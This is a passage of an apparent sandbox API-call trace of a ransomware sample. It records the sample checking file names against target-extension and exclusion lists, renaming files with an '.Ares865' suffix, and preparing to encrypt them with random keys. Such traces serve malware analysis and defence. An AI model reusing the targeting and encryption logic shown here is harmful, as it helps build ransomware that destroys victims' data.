(lpString1="htm", lpString2="dcb") returned 1 [0063.570] lstrlenW (lpString="dct") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0063.570] lstrlenW (lpString="dcx") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0063.570] lstrlenW (lpString="ddl") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0063.570] lstrlenW (lpString="dlis") returned 4 [0063.570] lstrcmpiW (lpString1=".htm", lpString2="dlis") returned -1 [0063.570] lstrlenW (lpString="dp1") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dp1") returned 1 [0063.570] lstrlenW (lpString="dqy") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dqy") returned 1 [0063.570] lstrlenW (lpString="dsk") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dsk") returned 1 [0063.570] lstrlenW (lpString="dsn") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dsn") returned 1 [0063.570] lstrlenW (lpString="dtsx") returned 4 [0063.570] lstrcmpiW (lpString1=".htm", lpString2="dtsx") returned -1 [0063.570] lstrlenW (lpString="dxl") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dxl") returned 1 [0063.570] lstrlenW (lpString="eco") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="eco") returned 1 [0063.571] lstrlenW (lpString="ecx") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="ecx") returned 1 [0063.571] lstrlenW (lpString="edb") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="edb") returned 1 [0063.571] lstrlenW (lpString="epim") returned 4 [0063.571] lstrcmpiW (lpString1=".htm", lpString2="epim") returned -1 [0063.571] lstrlenW (lpString="fcd") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="fcd") returned 1 [0063.571] lstrlenW (lpString="fdb") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="fdb") returned 1 [0063.571] lstrlenW (lpString="fic") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="fic") returned 1 [0063.571] lstrlenW (lpString="flexolibrary") returned 12 [0063.571] lstrlenW (lpString="fm5") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="fm5") returned 1 [0063.571] lstrlenW (lpString="fmp") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="fmp") returned 1 [0063.571] lstrlenW (lpString="fmp12") returned 5 [0063.571] lstrcmpiW (lpString1="k.htm", lpString2="fmp12") returned 1 [0063.571] lstrlenW (lpString="fmpsl") returned 5 [0063.571] lstrcmpiW (lpString1="k.htm", lpString2="fmpsl") returned 1 [0063.571] lstrlenW (lpString="fol") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="fol") returned 1 [0063.571] lstrlenW (lpString="fp3") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="fp3") returned 1 [0063.571] lstrlenW (lpString="fp4") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="fp4") returned 1 [0063.571] lstrlenW (lpString="fp5") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="fp5") returned 1 [0063.571] lstrlenW (lpString="fp7") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="fp7") returned 1 [0063.571] lstrlenW (lpString="fpt") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="fpt") returned 1 [0063.571] lstrlenW (lpString="frm") returned 3 [0063.571] lstrcmpiW (lpString1="htm", lpString2="frm") returned 1 [0063.571] lstrlenW (lpString="gdb") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.572] lstrlenW (lpString="gdb") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.572] lstrlenW (lpString="grdb") returned 4 [0063.572] lstrcmpiW (lpString1=".htm", lpString2="grdb") returned -1 [0063.572] lstrlenW (lpString="gwi") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="gwi") returned 1 [0063.572] lstrlenW (lpString="hdb") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="hdb") returned 1 [0063.572] lstrlenW (lpString="his") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="his") returned 1 [0063.572] lstrlenW (lpString="ib") returned 2 [0063.572] lstrcmpiW (lpString1="tm", lpString2="ib") returned 1 [0063.572] lstrlenW (lpString="idb") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="idb") returned -1 [0063.572] lstrlenW (lpString="ihx") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="ihx") returned -1 [0063.572] lstrlenW (lpString="itdb") returned 4 [0063.572] lstrcmpiW (lpString1=".htm", lpString2="itdb") returned -1 [0063.572] lstrlenW (lpString="itw") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="itw") returned -1 [0063.572] lstrlenW (lpString="jet") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="jet") returned -1 [0063.572] lstrlenW (lpString="jtx") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="jtx") returned -1 [0063.572] lstrlenW (lpString="kdb") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="kdb") returned -1 [0063.572] lstrlenW (lpString="kexi") returned 4 [0063.572] lstrcmpiW (lpString1=".htm", lpString2="kexi") returned -1 [0063.572] lstrlenW (lpString="kexic") returned 5 [0063.572] lstrcmpiW (lpString1="k.htm", lpString2="kexic") returned -1 [0063.572] lstrlenW (lpString="kexis") returned 5 [0063.572] lstrcmpiW (lpString1="k.htm", lpString2="kexis") returned -1 [0063.572] lstrlenW (lpString="lgc") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="lgc") returned -1 [0063.572] lstrlenW (lpString="lwx") returned 3 [0063.572] lstrcmpiW (lpString1="htm", lpString2="lwx") returned -1 [0063.572] lstrlenW (lpString="maf") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="maf") returned -1 [0063.573] lstrlenW (lpString="maq") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="maq") returned -1 [0063.573] lstrlenW (lpString="mar") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="mar") returned -1 [0063.573] lstrlenW (lpString="marshal") returned 7 [0063.573] lstrcmpiW (lpString1="ock.htm", lpString2="marshal") returned 1 [0063.573] lstrlenW (lpString="mas") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="mas") returned -1 [0063.573] lstrlenW (lpString="mav") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="mav") returned -1 [0063.573] lstrlenW (lpString="maw") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="maw") returned -1 [0063.573] lstrlenW (lpString="mdbhtml") returned 7 [0063.573] lstrcmpiW (lpString1="ock.htm", lpString2="mdbhtml") returned 1 [0063.573] lstrlenW (lpString="mdn") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="mdn") returned -1 [0063.573] lstrlenW (lpString="mdt") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="mdt") returned -1 [0063.573] lstrlenW (lpString="mfd") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="mfd") returned -1 [0063.573] lstrlenW (lpString="mpd") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="mpd") returned -1 [0063.573] lstrlenW (lpString="mrg") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="mrg") returned -1 [0063.573] lstrlenW (lpString="mud") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="mud") returned -1 [0063.573] lstrlenW (lpString="mwb") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="mwb") returned -1 [0063.573] lstrlenW (lpString="myd") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="myd") returned -1 [0063.573] lstrlenW (lpString="ndf") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="ndf") returned -1 [0063.573] lstrlenW (lpString="nnt") returned 3 [0063.573] lstrcmpiW (lpString1="htm", lpString2="nnt") returned -1 [0063.573] lstrlenW (lpString="nrmlib") returned 6 [0063.573] lstrcmpiW (lpString1="ck.htm", lpString2="nrmlib") returned -1 [0063.574] lstrlenW (lpString="ns2") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="ns2") returned -1 [0063.574] lstrlenW (lpString="ns3") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="ns3") returned -1 [0063.574] lstrlenW (lpString="ns4") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="ns4") returned -1 [0063.574] lstrlenW (lpString="nsf") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="nsf") returned -1 [0063.574] lstrlenW (lpString="nv") returned 2 [0063.574] lstrcmpiW (lpString1="tm", lpString2="nv") returned 1 [0063.574] lstrlenW (lpString="nv2") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="nv2") returned -1 [0063.574] lstrlenW (lpString="nwdb") returned 4 [0063.574] lstrcmpiW (lpString1=".htm", lpString2="nwdb") returned -1 [0063.574] lstrlenW (lpString="nyf") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="nyf") returned -1 [0063.574] lstrlenW (lpString="odb") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.574] lstrlenW (lpString="odb") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.574] lstrlenW (lpString="oqy") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="oqy") returned -1 [0063.574] lstrlenW (lpString="ora") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="ora") returned -1 [0063.574] lstrlenW (lpString="orx") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="orx") returned -1 [0063.574] lstrlenW (lpString="owc") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="owc") returned -1 [0063.574] lstrlenW (lpString="p96") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="p96") returned -1 [0063.574] lstrlenW (lpString="p97") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="p97") returned -1 [0063.574] lstrlenW (lpString="pan") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="pan") returned -1 [0063.574] lstrlenW (lpString="pdb") returned 3 [0063.574] lstrcmpiW (lpString1="htm", lpString2="pdb") returned -1 [0063.574] lstrlenW (lpString="pdm") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="pdm") returned -1 [0063.575] lstrlenW (lpString="pnz") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="pnz") returned -1 [0063.575] lstrlenW (lpString="qry") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="qry") returned -1 [0063.575] lstrlenW (lpString="qvd") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="qvd") returned -1 [0063.575] lstrlenW (lpString="rbf") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="rbf") returned -1 [0063.575] lstrlenW (lpString="rctd") returned 4 [0063.575] lstrcmpiW (lpString1=".htm", lpString2="rctd") returned -1 [0063.575] lstrlenW (lpString="rod") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="rod") returned -1 [0063.575] lstrlenW (lpString="rodx") returned 4 [0063.575] lstrcmpiW (lpString1=".htm", lpString2="rodx") returned -1 [0063.575] lstrlenW (lpString="rpd") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="rpd") returned -1 [0063.575] lstrlenW (lpString="rsd") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="rsd") returned -1 [0063.575] lstrlenW (lpString="sas7bdat") returned 8 [0063.575] lstrcmpiW (lpString1="cock.htm", lpString2="sas7bdat") returned -1 [0063.575] lstrlenW (lpString="sbf") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="sbf") returned -1 [0063.575] lstrlenW (lpString="scx") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="scx") returned -1 [0063.575] lstrlenW (lpString="sdb") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="sdb") returned -1 [0063.575] lstrlenW (lpString="sdc") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="sdc") returned -1 [0063.575] lstrlenW (lpString="sdf") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="sdf") returned -1 [0063.575] lstrlenW (lpString="sis") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="sis") returned -1 [0063.575] lstrlenW (lpString="spq") returned 3 [0063.575] lstrcmpiW (lpString1="htm", lpString2="spq") returned -1 [0063.575] lstrlenW (lpString="te") returned 2 [0063.575] lstrcmpiW (lpString1="tm", lpString2="te") returned 1 [0063.576] lstrlenW (lpString="teacher") returned 7 [0063.576] lstrcmpiW (lpString1="ock.htm", lpString2="teacher") returned -1 [0063.576] lstrlenW (lpString="tmd") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="tmd") returned -1 [0063.576] lstrlenW (lpString="tps") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="tps") returned -1 [0063.576] lstrlenW (lpString="trc") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.576] lstrlenW (lpString="trc") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.576] lstrlenW (lpString="trm") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="trm") returned -1 [0063.576] lstrlenW (lpString="udb") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="udb") returned -1 [0063.576] lstrlenW (lpString="udl") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="udl") returned -1 [0063.576] lstrlenW (lpString="usr") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="usr") returned -1 [0063.576] lstrlenW (lpString="v12") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="v12") returned -1 [0063.576] lstrlenW (lpString="vis") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="vis") returned -1 [0063.576] lstrlenW (lpString="vpd") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="vpd") returned -1 [0063.576] lstrlenW (lpString="vvv") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="vvv") returned -1 [0063.576] lstrlenW (lpString="wdb") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="wdb") returned -1 [0063.576] lstrlenW (lpString="wmdb") returned 4 [0063.576] lstrcmpiW (lpString1=".htm", lpString2="wmdb") returned -1 [0063.576] lstrlenW (lpString="wrk") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="wrk") returned -1 [0063.576] lstrlenW (lpString="xdb") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="xdb") returned -1 [0063.576] lstrlenW (lpString="xld") returned 3 [0063.576] lstrcmpiW (lpString1="htm", lpString2="xld") returned -1 [0063.576] lstrlenW (lpString="xmlff") returned 5 [0063.577] lstrcmpiW (lpString1="k.htm", lpString2="xmlff") returned -1 [0063.577] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.Ares865") returned 90 [0063.577] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\peacock.htm"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\peacock.htm.ares865"), dwFlags=0x1) returned 1 [0063.577] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\peacock.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.578] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=232) returned 1 [0063.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.578] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.579] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.579] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.579] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x164 [0063.581] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0063.582] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.582] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.582] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0063.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0063.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.583] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.583] CloseHandle (hObject=0x164) returned 1 [0063.583] CloseHandle (hObject=0x154) returned 1 [0063.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.584] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x649d3c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x649d3c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaa51b2c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="aoldtz.exe") returned 1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2=".") returned 1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="..") returned 1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="windows") returned -1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="bootmgr") returned 1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="temp") returned -1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="pagefile.sys") returned 1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="boot") returned 1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="ids.txt") returned 1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="ntuser.dat") returned 1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="perflogs") returned -1 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2="MSBuild") returned 1 [0063.584] lstrlenW (lpString="Peacock.jpg") returned 11 [0063.584] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 82 [0063.584] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Peacock.jpg" | out: lpString1="Peacock.jpg") returned="Peacock.jpg" [0063.584] lstrlenW (lpString="Peacock.jpg") returned 11 [0063.584] lstrlenW (lpString="Ares865") returned 7 [0063.584] lstrcmpiW (lpString1="ock.jpg", lpString2="Ares865") returned 1 [0063.584] lstrlenW (lpString=".dll") returned 4 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2=".dll") returned 1 [0063.584] lstrlenW (lpString=".lnk") returned 4 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2=".lnk") returned 1 [0063.584] lstrlenW (lpString=".ini") returned 4 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2=".ini") returned 1 [0063.584] lstrlenW (lpString=".sys") returned 4 [0063.584] lstrcmpiW (lpString1="Peacock.jpg", lpString2=".sys") returned 1 [0063.584] lstrlenW (lpString="Peacock.jpg") returned 11 [0063.584] lstrlenW (lpString="bak") returned 3 [0063.584] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0063.584] lstrlenW (lpString="ba_") returned 3 [0063.584] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0063.584] lstrlenW (lpString="dbb") returned 3 [0063.584] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0063.585] lstrlenW (lpString="vmdk") returned 4 [0063.585] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0063.585] lstrlenW (lpString="rar") returned 3 [0063.585] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0063.585] lstrlenW (lpString="zip") returned 3 [0063.585] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0063.585] lstrlenW (lpString="tgz") returned 3 [0063.585] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0063.585] lstrlenW (lpString="vbox") returned 4 [0063.585] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0063.585] lstrlenW (lpString="vdi") returned 3 [0063.585] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0063.585] lstrlenW (lpString="vhd") returned 3 [0063.585] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0063.585] lstrlenW (lpString="vhdx") returned 4 [0063.585] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0063.585] lstrlenW (lpString="avhd") returned 4 [0063.585] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0063.585] lstrlenW (lpString="db") returned 2 [0063.585] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0063.585] lstrlenW (lpString="db2") returned 3 [0063.585] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0063.585] lstrlenW (lpString="db3") returned 3 [0063.585] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0063.585] lstrlenW (lpString="dbf") returned 3 [0063.585] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0063.585] lstrlenW (lpString="mdf") returned 3 [0063.585] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0063.585] lstrlenW (lpString="mdb") returned 3 [0063.585] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0063.585] lstrlenW (lpString="sql") returned 3 [0063.585] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0063.585] lstrlenW (lpString="sqlite") returned 6 [0063.585] lstrcmpiW (lpString1="ck.jpg", lpString2="sqlite") returned -1 [0063.585] lstrlenW (lpString="sqlite3") returned 7 [0063.585] lstrcmpiW (lpString1="ock.jpg", lpString2="sqlite3") returned -1 [0063.585] lstrlenW (lpString="sqlitedb") returned 8 [0063.586] lstrcmpiW (lpString1="cock.jpg", lpString2="sqlitedb") returned -1 [0063.586] lstrlenW (lpString="xml") returned 3 [0063.586] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0063.586] lstrlenW (lpString="$er") returned 3 [0063.586] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0063.586] lstrlenW (lpString="4dd") returned 3 [0063.586] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0063.586] lstrlenW (lpString="4dl") returned 3 [0063.586] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0063.586] lstrlenW (lpString="^^^") returned 3 [0063.586] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0063.586] lstrlenW (lpString="abs") returned 3 [0063.586] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0063.586] lstrlenW (lpString="abx") returned 3 [0063.586] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0063.586] lstrlenW (lpString="accdb") returned 5 [0063.586] lstrcmpiW (lpString1="k.jpg", lpString2="accdb") returned 1 [0063.586] lstrlenW (lpString="accdc") returned 5 [0063.586] lstrcmpiW (lpString1="k.jpg", lpString2="accdc") returned 1 [0063.586] lstrlenW (lpString="accde") returned 5 [0063.586] lstrcmpiW (lpString1="k.jpg", lpString2="accde") returned 1 [0063.586] lstrlenW (lpString="accdr") returned 5 [0063.586] lstrcmpiW (lpString1="k.jpg", lpString2="accdr") returned 1 [0063.586] lstrlenW (lpString="accdt") returned 5 [0063.586] lstrcmpiW (lpString1="k.jpg", lpString2="accdt") returned 1 [0063.586] lstrlenW (lpString="accdw") returned 5 [0063.586] lstrcmpiW (lpString1="k.jpg", lpString2="accdw") returned 1 [0063.586] lstrlenW (lpString="accft") returned 5 [0063.586] lstrcmpiW (lpString1="k.jpg", lpString2="accft") returned 1 [0063.586] lstrlenW (lpString="adb") returned 3 [0063.586] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.586] lstrlenW (lpString="adb") returned 3 [0063.586] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.586] lstrlenW (lpString="ade") returned 3 [0063.586] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0063.586] lstrlenW (lpString="adf") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0063.587] lstrlenW (lpString="adn") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0063.587] lstrlenW (lpString="adp") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0063.587] lstrlenW (lpString="alf") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0063.587] lstrlenW (lpString="ask") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0063.587] lstrlenW (lpString="btr") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0063.587] lstrlenW (lpString="cat") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0063.587] lstrlenW (lpString="cdb") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0063.587] lstrlenW (lpString="ckp") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0063.587] lstrlenW (lpString="cma") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0063.587] lstrlenW (lpString="cpd") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0063.587] lstrlenW (lpString="dacpac") returned 6 [0063.587] lstrcmpiW (lpString1="ck.jpg", lpString2="dacpac") returned -1 [0063.587] lstrlenW (lpString="dad") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0063.587] lstrlenW (lpString="dadiagrams") returned 10 [0063.587] lstrcmpiW (lpString1="eacock.jpg", lpString2="dadiagrams") returned 1 [0063.587] lstrlenW (lpString="daschema") returned 8 [0063.587] 